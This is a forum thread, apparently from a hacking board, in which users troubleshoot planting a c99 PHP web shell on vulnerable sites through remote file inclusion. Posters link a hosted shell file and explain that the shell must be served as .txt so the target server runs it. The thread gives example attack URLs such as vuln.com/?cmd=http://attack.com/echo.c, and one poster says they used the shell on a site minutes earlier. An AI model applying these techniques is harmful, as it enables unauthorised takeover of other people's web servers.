c99 shell scripts
turbocharged_06 wrote: it doesnt work like a properly configured c99 shell
That is because it isn't a c99 shell for as far as I can see. Try this one: http://b0rizq.by.ru/c99.txt?&
I just used it 5 minutes ago on a site so I'm sure it works.
Good luck!
As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).
The reason you need to this is because the PHP code is being parsed on your server before being shipped to the vulnerable server meaning you'll get a static shell instead of the actual PHP code.
WhiteAcid wrote: As already said. It is because the PHP code should not be parsed. Either turn off PHP for that file or name it .txt (or something else that doesn't get parsed by PHP).
The reason you need to this is because the PHP code is being parsed on your server before being shipped to the vulnerable server meaning you'll get a static shell instead of the actual PHP code.
can you explain that one more time
you mean i should put this
markuphttp://b0rizq.by.ru/c99.txt?&
Into a file like
markuphttp://www.arabian-outlaw.com/c99.php
because when i did that it opened the shell on my website
Use http://b0rizq.by.ru/c99.txt in the attacks.
Here's a simpler explanation. Let's say you have a file called echo.php whose contents is:markup<?php echo "test"; ?>. You want to run this on vuln.com using RFI.
You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php
vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.
If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).
Does it make more sense now?
The php code itself is useless. It's just plain text until the server has baked a working page out of it which is called parsing.
Basically what Acid is saying is that if the shell is named ".php" http://b0rizq.by.ru will first parse the code and then send it to the vulnerable page. But that's not what you want! You want the vulnarble page to do the parsing, so you can access it's content. In order to accomplish this the shell needs to be a filesize which the php parser doesn't parse before the server sends it. That's why the shell needs to be a txt file.
I hope this explanation + Acids great example are sufficient!
Good luck!
S-H
WhiteAcid wrote: Use http://b0rizq.by.ru/c99.txt in the attacks.
Here's a simpler explanation. Let's say you have a file called echo.php whose contents is:markup<?php echo "test"; ?>. You want to run this on vuln.com using RFI.
You host this in attack.com/echo.php and call vuln.com/?cmd=http://attack.com/echo.php
vuln.com will send a request for that file, your site (attack.com) will get the request, parse it using PHP and send back the reply. vuln.com will get the reply, which will be test and include that, which is pointless.
If you renamed the file to .txt or .c or whatever and call vuln.com/?cmd=http://attack.com/echo.c then vuln.com will send the request to attack.com which will not parse the PHP file (as it isn't a .php file). This means vuln.com will get the reply <?php echo "test"; ?>, it will then execute that code (given the right type of flaw).
Does it make more sense now? yes thank you i have previously tried that and it does process the statement heres a picture of what i mean
ill update